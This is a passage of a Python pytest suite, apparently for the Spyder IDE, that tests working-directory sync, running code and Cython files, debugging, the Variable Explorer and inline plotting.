@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(
main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and File Explorer when
changing cwd in the IPython console.
"""
wdir = main_window.workingdirectory
treewidget = main_window.explorer.get_widget().treewidget
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp dir
temp_dir = str(tmpdir.mkdir(test_directory))
# Change directory in IPython console using %cd
with qtbot.waitSignal(shell.executed):
shell.execute(u"%cd {}".format(temp_dir))
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in explorer
assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
temp_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and IPython console when
changing directories in the File Explorer.
"""
wdir = main_window.workingdirectory
explorer = main_window.explorer
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp directory
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in the explorer widget
explorer.chdir(temp_dir)
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in IPython console
assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(os.name == 'nt' or sys.platform == 'darwin' or
parse_version(ipy_release.version) == parse_version('7.11.0')),
reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
"""Test all the different ways we have to run Cython code"""
# ---- Setup ----
# Get a reference to the code editor widget
code_editor = main_window.editor.get_focus_widget()
# ---- Run pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# Wait until an object appears
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
assert shell.get_value('a') == 3628800
# Reset and close file
reset_run_code(qtbot, shell, code_editor, nsb)
main_window.editor.close_file()
# ---- Import pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
assert shell.get_value('b') == 3628800
# Close file
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that notebooks are open from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty notebook in the project dir
nb = osp.join(LOCATION, 'notebook.ipynb')
shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select notebook in the project explorer
idx = projects.explorer.treewidget.get_index('notebook.ipynb')
projects.explorer.treewidget.setCurrentIndex(idx)
# Prese Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that notebook was open
assert 'notebook.ipynb' in editorstack.get_current_filename()
# Convert notebook to a Python file
projects.explorer.treewidget.convert_notebook(osp.join(project_dir, 'notebook.ipynb'))
# Assert notebook was open
assert 'untitled' in editorstack.get_current_filename()
# Assert its contents are the expected ones
file_text = editorstack.get_current_editor().toPlainText()
if nbconvert.__version__ >= '5.4.0':
expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
'\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
else:
expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
assert file_text == expected_text
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that file are run from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty file in the project dir
test_file = osp.join(LOCATION, 'script.py')
shutil.copy(test_file, osp.join(project_dir, 'script.py'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select file in the project explorer
idx = projects.explorer.treewidget.get_index('script.py')
projects.explorer.treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that the file was open
assert 'script.py' in editorstack.get_current_filename()
# Run Python file
projects.explorer.treewidget.run([osp.join(project_dir, 'script.py')])
# Wait until the new console is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Wait until all objects have appeared in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Check variables value
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
"""Test that new breakpoints are set in the IPython console."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that the breakpoint was set
shell.pdb_execute("!b")
qtbot.wait(500)
assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run lines ----
# Run the whole file line by line
for _ in range(code_editor.blockCount()):
qtbot.keyClick(code_editor, Qt.Key_F9)
qtbot.wait(200)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell and advance ----
# Run the five cells present in file
# Add an unnamed cell at the top of the file
qtbot.keyClicks(code_editor, 'a = 10')
qtbot.keyClick(code_editor, Qt.Key_Return)
qtbot.keyClick(code_editor, Qt.Key_Up)
for _ in range(5):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the runcell function
assert 'runcell' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
control_text = shell._control.toPlainText()
# Rerun
shell.setFocus()
qtbot.keyClick(shell._control, Qt.Key_Up)
qtbot.wait(500)
qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
qtbot.wait(500)
code_editor.setFocus()
assert control_text != shell._control.toPlainText()
control_text = shell._control.toPlainText()[len(control_text):]
# Check for errors and the runcell function
assert 'runcell' in control_text
assert 'Error' not in control_text
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell ----
# Run the first cell in file
modifier = Qt.ControlModifier
if sys.platform == 'darwin':
modifier = Qt.MetaModifier
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
# Press Ctrl+Enter a second time to verify that we're *not* advancing
# to the next cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
assert nsb.editor.source_model.rowCount() == 1
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Debug cell ------
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Re-run last cell ----
# Run the first three cells in file
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
# Wait until objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
timeout=EVAL_TIMEOUT)
# Clean namespace
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
# Wait until there are no objects in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
timeout=EVAL_TIMEOUT)
# Re-run last cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
assert shell.get_value('li') == [1, 2, 3]
# ---- Closing test file ----
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
[{'spy_config': ('editor', 'run_cell_copy', True)}],
indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Make sure run_cell_copy is properly set
for editorstack in main_window.editor.editorstacks:
editorstack.set_run_cell_copy(True)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run cell and advance ----
# Run the three cells present in file
for _ in range(4):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the copied code
assert 'runcell' not in shell._control.toPlainText()
assert 'a = 10' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# ---- Closing test file and reset config ----
main_window.editor.close_file()
CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('CI', None) is None or PYQT5,
reason="It times out sometimes on Windows, it's not "
"meant to be run outside of a CI and it segfaults "
"too frequently in PyQt5")
def test_open_files_in_new_editor_window(main_window, qtbot):
"""
This tests that opening files in a new editor window
is working as expected.
Test for spyder-ide/spyder#4085.
"""
# Set a timer to manipulate the open dialog while it's running
QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
'script.py',
directory=LOCATION))
# Create a new editor window
# Note: editor.load() uses the current editorstack by default
main_window.editor.create_new_window()
main_window.editor.load()
# Perform the test
# Note: There's always one file open in the Editor
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
"""Test closing spyder when there is a file with modifications open."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
editorstack = main_window.editor.get_current_editorstack()
editor = editorstack.get_current_editor()
editor.document().setModified(True)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
"""Test that the maximize button is working correctly."""
# Set focus to the Editor
main_window.editor.get_focus_widget().setFocus()
# Click the maximize button
max_action = main_window.layouts.maximize_action
max_button = main_window.main_toolbar.widgetForAction(max_action)
qtbot.mouseClick(max_button, Qt.LeftButton)
# Verify that the Editor is maximized
assert main_window.editor._ismaximized
# Verify that the action minimizes the plugin too
qtbot.mouseClick(max_button, Qt.LeftButton)
assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif((os.name == 'nt' or
os.environ.get('CI', None) is not None and PYQT_VERSION >= '5.9'),
reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
"""
Test for a segfault when these steps are followed:
1. Open an object present in the Variable Explorer (e.g. a list).
2. Delete that object in its corresponding console while its
editor is still open.
3. Closing that editor by pressing its *Ok* button.
"""
# Create the object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('myobj = [1, 2, 3]')
# Open editor associated with that object and get a reference to it
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']
# Move to the IPython console and delete that object
main_window.ipyconsole.get_focus_widget().setFocus()
with qtbot.waitSignal(shell.executed):
shell.execute('del myobj')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
# Close editor
ok_widget = obj_editor.btn_close
qtbot.mouseClick(ok_widget, Qt.LeftButton)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
"""
Test for errors when editing inline values in the Variable Explorer
and then moving to another plugin.
Note: Errors for this test don't appear related to it but instead they
are shown down the road. That's because they are generated by an
async C++ RuntimeError.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Change focus to IPython console
main_window.ipyconsole.get_focus_widget().setFocus()
# Wait for the error
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
"""Test that c and n Pdb commands update the Variable Explorer."""
nsb = main_window.variableexplorer.current_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that c works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!c')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 1)
# Verify that n works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 2)
# Verify that doesn't go to sitecustomize.py with next and stops
# the debugging session.
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 3)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Assert that the prompt appear
shell.clear_console()
assert 'In [2]:' in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
"""Test that we correctly stop a debugging session."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Move to the next line
shell.pdb_execute("!n")
qtbot.wait(1000)
# Stop debugging
stop_debug_action = main_window.debug_toolbar_actions[5]
stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Assert there are only two ipdb prompts in the console
assert shell._control.toPlainText().count('IPdb') == 2
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
"""
Test that using the Working directory toolbar is working while debugging.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set LOCATION as cwd
main_window.workingdirectory.chdir(tempfile.gettempdir())
qtbot.wait(1000)
print(repr(control.toPlainText()))
shell.clear_console()
qtbot.wait(500)
# Get cwd in console
qtbot.keyClicks(control, 'import os; os.getcwd()')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Assert cwd is the right one
assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
"""Test that %varexp is working while debugging."""
nsb = main_window.variableexplorer.current_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Get to an object that can be plotted
for _ in range(2):
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Generate the plot from the Variable Explorer
nsb.editor.plot('li', 'plot')
qtbot.wait(1000)
# Assert that there's a plot in the console
assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
"""
Test that plots generated in the IPython console are properly displayed
in the plots plugin.
"""
assert CONF.get('plots', 'mute_inline_plotting') is False
shell = main_window.ipyconsole.get_current_shellwidget()
figbrowser = main_window.plots.current_widget()
# Wait until the window is fully up.
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate a plot inline.
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig = plt.plot([1, 2, 3, 4], '.')\n"))
if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
else:
assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'
# Get the image name from the html, fetch the image from the shell, and
# save it as a png.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
ipython_qimg = shell._get_image(img_name)
ipython_qimg.save(ipython_figname)
# Save the image with the Plots plugin as a png.
plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
return_value=(plots_figname, '.png'))
figbrowser.save_figure()
assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(parse_version(ipy_release.version) >= parse_version('7.23.0') and
parse_version(ipykernel.__version__) <= parse_version('5.5.3')),
reason="Fails due to a bug in the %matplotlib magic")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
"""
Test that the option to set bbox_inches to 'tight' or 'None' is
working when plotting inline in the IPython console. By default, figures
are plotted inline with bbox_inches='tight'.
"""
tmpdir = to_text_string(tmpdir)
# Assert that the default is True.
assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
# Wait until the window is fully up.
shell = main_window.ipyconsole.get_current_shellwidget()
client = main_window.ipyconsole.get_current_client()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Generate a plot inline with bbox_inches=tight (since it is default) and
# save the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches='tight',\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# Change the option so that bbox_inches=None.
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
# Restart the kernel and wait until it's up again
shell._prompt_html = None
client.restart_kernel()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate the same plot inline with bbox_inches='tight' and save the
# figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches=None,\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
